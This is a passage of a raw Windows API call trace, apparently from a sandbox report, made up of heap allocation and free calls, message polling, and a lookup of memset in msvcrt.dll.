0x9ba270 [0173.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.510] CharLowerBuffW (in: lpsz="byte[60058]", cchLength=0xb | out: lpsz="byte[60058]") returned 0xb [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.511] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.511] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0173.511] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0173.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.511] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0173.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.512] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2628 [0173.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2628, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0173.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.512] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0173.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0173.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.514] FreeLibrary (hLibModule=0x75c90000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.515] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.515] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0173.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0173.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.516] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0173.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.519] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.519] RtlAllocateHeap 